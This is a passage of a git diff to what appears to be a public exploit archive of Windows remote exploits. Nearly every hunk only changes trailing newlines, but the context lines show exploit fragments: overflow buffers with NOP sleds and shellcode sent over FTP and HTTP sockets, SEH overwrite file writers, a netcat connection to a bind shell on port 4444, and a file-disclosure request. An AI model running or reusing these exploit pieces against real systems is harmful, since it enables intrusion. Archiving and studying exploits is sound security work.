Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/37840.txt b/platforms/windows/remote/37840.txt index 0ce41c1b4..e378c3f8d 100755 --- a/platforms/windows/remote/37840.txt +++ b/platforms/windows/remote/37840.txt @@ -14,4 +14,4 @@ The PoC writes calc.bat to startup folder. It has been tested by injecting the d Jietao Yang of KeenTeam (@K33nTeam) is credited for the vulnerability. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip \ No newline at end of file diff --git a/platforms/windows/remote/37841.txt b/platforms/windows/remote/37841.txt index 9c53a55de..64702d1cc 100755 --- a/platforms/windows/remote/37841.txt +++ b/platforms/windows/remote/37841.txt @@ -15,4 +15,4 @@ Jietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerabili Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip \ No newline at end of file diff --git a/platforms/windows/remote/37951.py b/platforms/windows/remote/37951.py index 944a215c4..bf37dbd0d 100755 --- a/platforms/windows/remote/37951.py +++ b/platforms/windows/remote/37951.py @@ -91,4 +91,4 @@ print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/37952.py b/platforms/windows/remote/37952.py index 585968bec..d5bf681de 100755 --- a/platforms/windows/remote/37952.py +++ b/platforms/windows/remote/37952.py @@ -69,4 +69,4 @@ print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/38003.py b/platforms/windows/remote/38003.py index 1f5bd489f..b2e67a1f4 100755 --- a/platforms/windows/remote/38003.py +++ b/platforms/windows/remote/38003.py @@ -59,4 +59,4 @@ s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('GET ' + baddata +'\x90'*15+ shellcode+ '\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/38005.asp b/platforms/windows/remote/38005.asp index 2bf0e2cbd..84d27f56a 100755 --- a/platforms/windows/remote/38005.asp +++ b/platforms/windows/remote/38005.asp @@ -142,4 +142,4 @@ Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03
    Program to Execute: - + \ No newline at end of file diff --git a/platforms/windows/remote/38013.py b/platforms/windows/remote/38013.py index fc17712f6..0f309edf4 100755 --- a/platforms/windows/remote/38013.py +++ b/platforms/windows/remote/38013.py @@ -54,4 +54,4 @@ s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/3804.txt b/platforms/windows/remote/3804.txt index 086f143c0..1a436c7f8 100755 --- a/platforms/windows/remote/3804.txt +++ b/platforms/windows/remote/3804.txt @@ -2,4 +2,4 @@ MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3804.zip (04262007-gdi_remote_elevation_privilege_exploit_ms07_017_principal.zip) -# milw0rm.com [2007-04-26] +# milw0rm.com [2007-04-26] \ No newline at end of file diff --git a/platforms/windows/remote/3808.html b/platforms/windows/remote/3808.html index 555aadf9f..a8969b56f 100755 --- a/platforms/windows/remote/3808.html +++ b/platforms/windows/remote/3808.html @@ -52,4 +52,4 @@ -# milw0rm.com [2007-04-27] +# milw0rm.com [2007-04-27] \ No newline at end of file diff --git a/platforms/windows/remote/3810.html b/platforms/windows/remote/3810.html index 8cc328c3d..fe029ef82 100755 --- a/platforms/windows/remote/3810.html +++ b/platforms/windows/remote/3810.html @@ -80,4 +80,4 @@ target.CreateMediaGroup arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 -# milw0rm.com [2007-04-27] +# milw0rm.com [2007-04-27] \ No newline at end of file diff --git a/platforms/windows/remote/38206.html b/platforms/windows/remote/38206.html index 9cdd9b0ce..cb6da712a 100755 --- a/platforms/windows/remote/38206.html +++ b/platforms/windows/remote/38206.html @@ -27,4 +27,4 @@ Concept"> - + \ No newline at end of file diff --git a/platforms/windows/remote/38252.py b/platforms/windows/remote/38252.py index 8e983cab7..2308a2849 100755 --- a/platforms/windows/remote/38252.py +++ b/platforms/windows/remote/38252.py @@ -43,4 +43,4 @@ s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User ' + evil ) -print '[+] https://www.infogen.al/ [+]' +print '[+] https://www.infogen.al/ [+]' \ No newline at end of file diff --git a/platforms/windows/remote/38260.php b/platforms/windows/remote/38260.php index 37c705113..3bc74f0d1 100755 --- a/platforms/windows/remote/38260.php +++ b/platforms/windows/remote/38260.php @@ -24,4 +24,4 @@ Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html } ftp_close($conn_id); ?> ---------------------------------------------------------------------- +--------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/38330.txt b/platforms/windows/remote/38330.txt index 1fdb76885..664d597cc 100755 --- a/platforms/windows/remote/38330.txt +++ b/platforms/windows/remote/38330.txt @@ -16,4 +16,4 @@ BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved) MessageBox(0,"DLL Injection","DLL Injection", 0); } return TRUE; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/38340.py b/platforms/windows/remote/38340.py index 7cd968d0d..6ce46055c 100755 --- a/platforms/windows/remote/38340.py +++ b/platforms/windows/remote/38340.py @@ -15,4 +15,4 @@ file = open('boot.ini.txt', 'r') print "[**] Printing what's inside boot.ini\n" print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" print file.read() -print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" +print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" \ No newline at end of file diff --git a/platforms/windows/remote/38341.py b/platforms/windows/remote/38341.py index e5351be21..db67d5ba9 100755 --- a/platforms/windows/remote/38341.py +++ b/platforms/windows/remote/38341.py @@ -15,4 +15,4 @@ file = open('boot.ini.txt', 'r') print "[**] Printing what's inside boot.ini\n" print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" print file.read() -print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" +print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" \ No newline at end of file diff --git a/platforms/windows/remote/38384.txt b/platforms/windows/remote/38384.txt index 9c69f7534..4ab82c3bd 100755 --- a/platforms/windows/remote/38384.txt +++ b/platforms/windows/remote/38384.txt @@ -9,4 +9,4 @@ $ sudo openssl s_server -key key.pem -cert cert.pem -accept 443 Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38384.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38384.zip \ No newline at end of file diff --git a/platforms/windows/remote/38388.txt b/platforms/windows/remote/38388.txt index a8f270b21..19f4dd298 100755 --- a/platforms/windows/remote/38388.txt +++ b/platforms/windows/remote/38388.txt @@ -69,6 +69,4 @@ eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10 eip=01723097 esp=003527f8 ebp=00352818 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 Qv+0x5f3097: -01723097 895104 mov dword ptr [ecx+4],edx ds:002b:bbbbbbbb=???????? - - +01723097 895104 mov dword ptr [ecx+4],edx ds:002b:bbbbbbbb=???????? \ No newline at end of file diff --git a/platforms/windows/remote/38394.py b/platforms/windows/remote/38394.py index f9c59283e..5828de051 100755 --- a/platforms/windows/remote/38394.py +++ b/platforms/windows/remote/38394.py @@ -44,5 +44,4 @@ shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" f = open(filename,"wb") f.write(junk+nseh+seh+nops+shellcode) f.close() -print("Finish") - +print("Finish") \ No newline at end of file diff --git a/platforms/windows/remote/3844.html b/platforms/windows/remote/3844.html index f8fc4351c..25c0d4fa5 100755 --- a/platforms/windows/remote/3844.html +++ b/platforms/windows/remote/3844.html @@ -53,4 +53,4 @@ -# milw0rm.com [2007-05-04] +# milw0rm.com [2007-05-04] \ No newline at end of file diff --git a/platforms/windows/remote/38500.php b/platforms/windows/remote/38500.php index 67714455e..64ebe7402 100755 --- a/platforms/windows/remote/38500.php +++ b/platforms/windows/remote/38500.php @@ -224,5 +224,4 @@ else usleep(100000); } - ?> - + ?> \ No newline at end of file diff --git a/platforms/windows/remote/38512.php b/platforms/windows/remote/38512.php index 06ce6e3c9..53c508ee5 100755 --- a/platforms/windows/remote/38512.php +++ b/platforms/windows/remote/38512.php @@ -41,4 +41,4 @@ } - ?> + ?> \ No newline at end of file diff --git a/platforms/windows/remote/38513.txt b/platforms/windows/remote/38513.txt index 496bca28a..d50fcb8d3 100755 --- a/platforms/windows/remote/38513.txt +++ b/platforms/windows/remote/38513.txt @@ -129,4 +129,4 @@ of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, -this information. +this information. \ No newline at end of file diff --git a/platforms/windows/remote/38526.py b/platforms/windows/remote/38526.py index 8a22985bb..e221cf7f7 100755 --- a/platforms/windows/remote/38526.py +++ b/platforms/windows/remote/38526.py @@ -87,4 +87,4 @@ s.connect((host, port)) s.send(httpreq) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/38644.txt b/platforms/windows/remote/38644.txt index 921777a97..8f060f0e9 100755 --- a/platforms/windows/remote/38644.txt +++ b/platforms/windows/remote/38644.txt @@ -28,4 +28,4 @@ Please note that a manager restart will be needed before you can login with the can be accomplished by running "/etc/init.d/contego-manager restart" Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38644.zip \ No newline at end of file diff --git a/platforms/windows/remote/38667.py b/platforms/windows/remote/38667.py index 22b0ce38f..bc26ce375 100755 --- a/platforms/windows/remote/38667.py +++ b/platforms/windows/remote/38667.py @@ -78,4 +78,4 @@ for string in overflow_strings: req=build_injection_req(build_update_query(string)) do_get_request(req) clear_overflow_data() -insert_overflow_data() +insert_overflow_data() \ No newline at end of file diff --git a/platforms/windows/remote/38694.txt b/platforms/windows/remote/38694.txt index 3b0da6b7c..ab73846c1 100755 --- a/platforms/windows/remote/38694.txt +++ b/platforms/windows/remote/38694.txt @@ -15,4 +15,4 @@ int egg() system ("calc"); exit(0); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/remote/3872.html b/platforms/windows/remote/3872.html index bf16b8d5b..2367e2473 100755 --- a/platforms/windows/remote/3872.html +++ b/platforms/windows/remote/3872.html @@ -75,4 +75,4 @@ target.SaveBarCode arg1 -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/windows/remote/3877.html b/platforms/windows/remote/3877.html index eb5fac388..d91da7e4e 100755 --- a/platforms/windows/remote/3877.html +++ b/platforms/windows/remote/3877.html @@ -76,4 +76,4 @@ target.DoWebMenuAction arg1 -# milw0rm.com [2007-05-08] +# milw0rm.com [2007-05-08] \ No newline at end of file diff --git a/platforms/windows/remote/3880.html b/platforms/windows/remote/3880.html index 3a36fa0a4..1fda18e8c 100755 --- a/platforms/windows/remote/3880.html +++ b/platforms/windows/remote/3880.html @@ -72,4 +72,4 @@ target.SetEvalExpiryDate arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/windows/remote/3881.html b/platforms/windows/remote/3881.html index e68d7a545..00683c4d1 100755 --- a/platforms/windows/remote/3881.html +++ b/platforms/windows/remote/3881.html @@ -69,4 +69,4 @@ target.SetEvalExpiryDate arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/windows/remote/3882.html b/platforms/windows/remote/3882.html index 3c55f6378..f07c1125e 100755 --- a/platforms/windows/remote/3882.html +++ b/platforms/windows/remote/3882.html @@ -65,4 +65,4 @@ target.Verify arg1 -# milw0rm.com [2007-05-09] +# milw0rm.com [2007-05-09] \ No newline at end of file diff --git a/platforms/windows/remote/38829.py b/platforms/windows/remote/38829.py index 6446dbcbb..c4fb01204 100755 --- a/platforms/windows/remote/38829.py +++ b/platforms/windows/remote/38829.py @@ -196,4 +196,4 @@ httpreq = ( s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/38859.rb b/platforms/windows/remote/38859.rb index 6a81b42a1..018a1449a 100755 --- a/platforms/windows/remote/38859.rb +++ b/platforms/windows/remote/38859.rb @@ -152,4 +152,4 @@ class Metasploit3 < Msf::Exploit::Remote super("#{rhost}:#{rport} - #{msg}") end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/38911.txt b/platforms/windows/remote/38911.txt index 7f1b790ba..23da0f0d7 100755 --- a/platforms/windows/remote/38911.txt +++ b/platforms/windows/remote/38911.txt @@ -69,4 +69,4 @@ end function -------------------------------------------------------------------- +------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/38912.txt b/platforms/windows/remote/38912.txt index a921b6e0d..64cc921fa 100755 --- a/platforms/windows/remote/38912.txt +++ b/platforms/windows/remote/38912.txt @@ -148,5 +148,4 @@ This advisory has been signed with the GPG key of Core Security advisories team, _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure -Web Archives & RSS: http://seclists.org/fulldisclosure/ - +Web Archives & RSS: http://seclists.org/fulldisclosure/ \ No newline at end of file diff --git a/platforms/windows/remote/38918.txt b/platforms/windows/remote/38918.txt index 2c0397910..04388f700 100755 --- a/platforms/windows/remote/38918.txt +++ b/platforms/windows/remote/38918.txt @@ -44,5 +44,4 @@ It is also possible to trigger this DLL load without a user click with the follo Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38918.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38918.zip \ No newline at end of file diff --git a/platforms/windows/remote/3892.html b/platforms/windows/remote/3892.html index a3738a59b..f0e64b17d 100755 --- a/platforms/windows/remote/3892.html +++ b/platforms/windows/remote/3892.html @@ -17,4 +17,4 @@ -# milw0rm.com [2007-05-10] +# milw0rm.com [2007-05-10] \ No newline at end of file diff --git a/platforms/windows/remote/3893.c b/platforms/windows/remote/3893.c index 9d7fdd8ab..aaa963c76 100755 --- a/platforms/windows/remote/3893.c +++ b/platforms/windows/remote/3893.c @@ -190,4 +190,4 @@ fflush(fp); printf("[+] exploit write to %s success!\n", file); } -// milw0rm.com [2007-05-10] +// milw0rm.com [2007-05-10] \ No newline at end of file diff --git a/platforms/windows/remote/38968.txt b/platforms/windows/remote/38968.txt index 0ca6ee867..694b60864 100755 --- a/platforms/windows/remote/38968.txt +++ b/platforms/windows/remote/38968.txt @@ -93,5 +93,4 @@ It is also possible to trigger this DLL load without requiring a user click by u Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38968.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38968.zip \ No newline at end of file diff --git a/platforms/windows/remote/3899.html b/platforms/windows/remote/3899.html index 11202cc20..4049a6b10 100755 --- a/platforms/windows/remote/3899.html +++ b/platforms/windows/remote/3899.html @@ -42,4 +42,4 @@ -# milw0rm.com [2007-05-11] +# milw0rm.com [2007-05-11] \ No newline at end of file diff --git a/platforms/windows/remote/39008.py b/platforms/windows/remote/39008.py index e1051c77a..6d02ec0eb 100755 --- a/platforms/windows/remote/39008.py +++ b/platforms/windows/remote/39008.py @@ -54,4 +54,4 @@ a.send("GET " + buff + " HTTP/1.0\r\n\r\n") a.close() -print "Done..." +print "Done..." \ No newline at end of file diff --git a/platforms/windows/remote/39009.py b/platforms/windows/remote/39009.py index 3d7bc29b8..145f3e448 100755 --- a/platforms/windows/remote/39009.py +++ b/platforms/windows/remote/39009.py @@ -54,4 +54,4 @@ a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") a.close() -print "Done..." +print "Done..." \ No newline at end of file diff --git a/platforms/windows/remote/39105.py b/platforms/windows/remote/39105.py index f3055bb9c..10bf6e438 100755 --- a/platforms/windows/remote/39105.py +++ b/platforms/windows/remote/39105.py @@ -131,4 +131,4 @@ print "[+] Sending exploit: OK\n" sleep(3) cl.close() -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/39119.py b/platforms/windows/remote/39119.py index c4c3c674d..3cd3a1c9f 100755 --- a/platforms/windows/remote/39119.py +++ b/platforms/windows/remote/39119.py @@ -338,4 +338,4 @@ for index in range(len(buffer)): time.sleep(2) os.system("nc -nv " + host + " 4444") except: - print "[-] Error sending buffer" + print "[-] Error sending buffer" \ No newline at end of file diff --git a/platforms/windows/remote/3913.c b/platforms/windows/remote/3913.c index ed4459b7f..740254401 100755 --- a/platforms/windows/remote/3913.c +++ b/platforms/windows/remote/3913.c @@ -298,4 +298,4 @@ void usage(char *progname){ exit(0); } -// milw0rm.com [2007-05-12] +// milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/windows/remote/3916.php b/platforms/windows/remote/3916.php index a69f3886e..b1d4874be 100755 --- a/platforms/windows/remote/3916.php +++ b/platforms/windows/remote/3916.php @@ -52,4 +52,4 @@ echo ""; -# milw0rm.com [2007-05-13] +# milw0rm.com [2007-05-13] \ No newline at end of file diff --git a/platforms/windows/remote/39161.py b/platforms/windows/remote/39161.py index cc2330371..3ab9bc5a5 100755 --- a/platforms/windows/remote/39161.py +++ b/platforms/windows/remote/39161.py @@ -47,4 +47,4 @@ except: print """[.]Something went wrong..! Usage is :[.] python exploit.py Don't forgot to change the Local IP address and Port number on the script""" - + \ No newline at end of file diff --git a/platforms/windows/remote/39215.py b/platforms/windows/remote/39215.py index 892d8efac..4ca69affc 100755 --- a/platforms/windows/remote/39215.py +++ b/platforms/windows/remote/39215.py @@ -65,4 +65,4 @@ data = s.recv(1024) s.send('PASS anonymous' + '\r\n') data = s.recv(1024) s.send('CWD ' +buffer+'\r\n') -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/remote/39218.html b/platforms/windows/remote/39218.html index 7b0769b5b..be367a74b 100755 --- a/platforms/windows/remote/39218.html +++ b/platforms/windows/remote/39218.html @@ -58,5 +58,4 @@ try { x.send(); } catch (e) {}; try { x.send(); } catch (e) {}; } } - - + \ No newline at end of file diff --git a/platforms/windows/remote/3925.py b/platforms/windows/remote/3925.py index 5b4d2f490..f8c3aa478 100755 --- a/platforms/windows/remote/3925.py +++ b/platforms/windows/remote/3925.py @@ -56,4 +56,4 @@ try: except: print 'usage : %s [target]'%sys.argv[0] -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/windows/remote/3927.html b/platforms/windows/remote/3927.html index 0a2bacd93..1aeab9002 100755 --- a/platforms/windows/remote/3927.html +++ b/platforms/windows/remote/3927.html @@ -42,4 +42,4 @@ -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/windows/remote/3934.py b/platforms/windows/remote/3934.py index 2abd5c966..63cf39a0a 100755 --- a/platforms/windows/remote/3934.py +++ b/platforms/windows/remote/3934.py @@ -53,4 +53,4 @@ print "Done" # EoF -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/windows/remote/3938.html b/platforms/windows/remote/3938.html index 608ed464e..db58b9e52 100755 --- a/platforms/windows/remote/3938.html +++ b/platforms/windows/remote/3938.html @@ -43,4 +43,4 @@ -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/windows/remote/3950.html b/platforms/windows/remote/3950.html index a25ad1dbf..4eee70556 100755 --- a/platforms/windows/remote/3950.html +++ b/platforms/windows/remote/3950.html @@ -58,4 +58,4 @@ -# milw0rm.com [2007-05-18] +# milw0rm.com [2007-05-18] \ No newline at end of file diff --git a/platforms/windows/remote/3951.html b/platforms/windows/remote/3951.html index f39246605..b1d356df1 100755 --- a/platforms/windows/remote/3951.html +++ b/platforms/windows/remote/3951.html @@ -61,4 +61,4 @@ -# milw0rm.com [2007-05-18] +# milw0rm.com [2007-05-18] \ No newline at end of file diff --git a/platforms/windows/remote/3952.html b/platforms/windows/remote/3952.html index 70232d8f9..789562dc3 100755 --- a/platforms/windows/remote/3952.html +++ b/platforms/windows/remote/3952.html @@ -61,4 +61,4 @@ -# milw0rm.com [2007-05-18] +# milw0rm.com [2007-05-18] \ No newline at end of file diff --git a/platforms/windows/remote/3954.py b/platforms/windows/remote/3954.py index 38f9aa151..34291f65d 100755 --- a/platforms/windows/remote/3954.py +++ b/platforms/windows/remote/3954.py @@ -95,4 +95,4 @@ for option, value in options: tftpd=value exploit() -# milw0rm.com [2007-05-19] +# milw0rm.com [2007-05-19] \ No newline at end of file diff --git a/platforms/windows/remote/39585.py b/platforms/windows/remote/39585.py index b2add1bf8..07aa147b0 100755 --- a/platforms/windows/remote/39585.py +++ b/platforms/windows/remote/39585.py @@ -87,5 +87,4 @@ head += "\r\n" head += buff conn = httplib.HTTPConnection(target,port) -conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head) - +conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head) \ No newline at end of file diff --git a/platforms/windows/remote/39599.txt b/platforms/windows/remote/39599.txt index 2a86d69a3..eccebc802 100755 --- a/platforms/windows/remote/39599.txt +++ b/platforms/windows/remote/39599.txt @@ -109,4 +109,4 @@ Any secrets stored in the registry are also exposed to attackers via RegQueryVal Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39599.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39599.zip \ No newline at end of file diff --git a/platforms/windows/remote/3961.html b/platforms/windows/remote/3961.html index efdd148a9..d34ef03da 100755 --- a/platforms/windows/remote/3961.html +++ b/platforms/windows/remote/3961.html @@ -42,4 +42,4 @@ -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/windows/remote/3966.php b/platforms/windows/remote/3966.php index 66d1ee00c..b0fc7bcfb 100755 --- a/platforms/windows/remote/3966.php +++ b/platforms/windows/remote/3966.php @@ -57,4 +57,4 @@ echo ""; -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/windows/remote/3967.html b/platforms/windows/remote/3967.html index cfee6fdbb..0626eab7a 100755 --- a/platforms/windows/remote/3967.html +++ b/platforms/windows/remote/3967.html @@ -19,4 +19,4 @@ VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/windows/remote/3968.html b/platforms/windows/remote/3968.html index 6939aeb9b..14211793d 100755 --- a/platforms/windows/remote/3968.html +++ b/platforms/windows/remote/3968.html @@ -105,4 +105,4 @@ try -# milw0rm.com [2007-05-22] +# milw0rm.com [2007-05-22] \ No newline at end of file diff --git a/platforms/windows/remote/39735.rb b/platforms/windows/remote/39735.rb index 1359d1bc3..a84a5d5fe 100755 --- a/platforms/windows/remote/39735.rb +++ b/platforms/windows/remote/39735.rb @@ -127,4 +127,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Executing #{filename}...") return unless exec_file?(filename) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/39755.py b/platforms/windows/remote/39755.py index 4fc08a495..3f02d4699 100755 --- a/platforms/windows/remote/39755.py +++ b/platforms/windows/remote/39755.py @@ -445,4 +445,4 @@ if __name__ == "__main__": except KeyboardInterrupt: print '^C received, shutting down the web server' - server.socket.close() + server.socket.close() \ No newline at end of file diff --git a/platforms/windows/remote/3982.html b/platforms/windows/remote/3982.html index d5b760444..af59b90f8 100755 --- a/platforms/windows/remote/3982.html +++ b/platforms/windows/remote/3982.html @@ -33,4 +33,4 @@ Service.Uninstall argh -# milw0rm.com [2007-05-24] +# milw0rm.com [2007-05-24] \ No newline at end of file diff --git a/platforms/windows/remote/3984.html b/platforms/windows/remote/3984.html index 9efe0a4fa..c421de038 100755 --- a/platforms/windows/remote/3984.html +++ b/platforms/windows/remote/3984.html @@ -26,4 +26,4 @@ DartZip.QuickZip Source ,Destination ,IncludeSubs ,PreservePath ,Password ,Encry -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/windows/remote/39858.py b/platforms/windows/remote/39858.py index 47ca6cdaf..afb1f79ae 100755 --- a/platforms/windows/remote/39858.py +++ b/platforms/windows/remote/39858.py @@ -149,6 +149,4 @@ try: except Exception as e: print '[*] Exception. Exiting.' print e - client.close() - - + client.close() \ No newline at end of file diff --git a/platforms/windows/remote/39907.rb b/platforms/windows/remote/39907.rb index 24d2ccc11..3149d31fb 100755 --- a/platforms/windows/remote/39907.rb +++ b/platforms/windows/remote/39907.rb @@ -191,4 +191,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/3993.html b/platforms/windows/remote/3993.html index 1a3decd0e..602e91d7b 100755 --- a/platforms/windows/remote/3993.html +++ b/platforms/windows/remote/3993.html @@ -48,4 +48,4 @@ BaseRunner.Send485CMD SunTzu -# milw0rm.com [2007-05-26] +# milw0rm.com [2007-05-26] \ No newline at end of file diff --git a/platforms/windows/remote/3996.c b/platforms/windows/remote/3996.c index 6f96092d1..79300e189 100755 --- a/platforms/windows/remote/3996.c +++ b/platforms/windows/remote/3996.c @@ -203,4 +203,4 @@ int main(int argc, char *argv[]) exit(1); } -// milw0rm.com [2007-05-26] +// milw0rm.com [2007-05-26] \ No newline at end of file diff --git a/platforms/windows/remote/39985.rb b/platforms/windows/remote/39985.rb index 2fa341e44..82f61bceb 100755 --- a/platforms/windows/remote/39985.rb +++ b/platforms/windows/remote/39985.rb @@ -421,4 +421,4 @@ class MetasploitModule < Msf::Auxiliary print_status("Attack failed or empty config file encountered ...") end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/4008.html b/platforms/windows/remote/4008.html index 8dfcbf2b6..378ac916d 100755 --- a/platforms/windows/remote/4008.html +++ b/platforms/windows/remote/4008.html @@ -29,4 +29,4 @@ End Sub -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/windows/remote/4010.html b/platforms/windows/remote/4010.html index 561df6971..fc8cfe25a 100755 --- a/platforms/windows/remote/4010.html +++ b/platforms/windows/remote/4010.html @@ -46,4 +46,4 @@ -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/windows/remote/40138.py b/platforms/windows/remote/40138.py index 66501114f..cf3c025a3 100755 --- a/platforms/windows/remote/40138.py +++ b/platforms/windows/remote/40138.py @@ -99,4 +99,4 @@ evil = "\x00\x02" + filename + "\x00" + mode + "\x00" print "[*] Sending evil packet, ph33r" s.sendto(evil, (host, port)) -print "[*] Check port 4444 for bindshell" +print "[*] Check port 4444 for bindshell" \ No newline at end of file diff --git a/platforms/windows/remote/4014.py b/platforms/windows/remote/4014.py index 959ee919e..00c9357e4 100755 --- a/platforms/windows/remote/4014.py +++ b/platforms/windows/remote/4014.py @@ -113,4 +113,4 @@ while(1): # EoF -# milw0rm.com [2007-05-30] +# milw0rm.com [2007-05-30] \ No newline at end of file diff --git a/platforms/windows/remote/4015.html b/platforms/windows/remote/4015.html index 3ebe71969..26e5894e1 100755 --- a/platforms/windows/remote/4015.html +++ b/platforms/windows/remote/4015.html @@ -197,4 +197,4 @@ MjpegControl.PtzUrl = suntzu -# milw0rm.com [2007-05-31] +# milw0rm.com [2007-05-31] \ No newline at end of file diff --git a/platforms/windows/remote/4016.sh b/platforms/windows/remote/4016.sh index 3bcb47206..b40a46ab4 100755 --- a/platforms/windows/remote/4016.sh +++ b/platforms/windows/remote/4016.sh @@ -16,4 +16,4 @@ protectedObject=$2 evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full' lynx -dump $evil -# milw0rm.com [2007-05-31] +# milw0rm.com [2007-05-31] \ No newline at end of file diff --git a/platforms/windows/remote/4021.html b/platforms/windows/remote/4021.html index a62bf5ed5..5facf2efa 100755 --- a/platforms/windows/remote/4021.html +++ b/platforms/windows/remote/4021.html @@ -56,4 +56,4 @@ End Sub -# milw0rm.com [2007-06-01] +# milw0rm.com [2007-06-01] \ No newline at end of file diff --git a/platforms/windows/remote/4023.html b/platforms/windows/remote/4023.html index 58b5ab811..e81c941b0 100755 --- a/platforms/windows/remote/4023.html +++ b/platforms/windows/remote/4023.html @@ -21,4 +21,4 @@ Camimage.URL = suntzu -# milw0rm.com [2007-06-02] +# milw0rm.com [2007-06-02] \ No newline at end of file diff --git 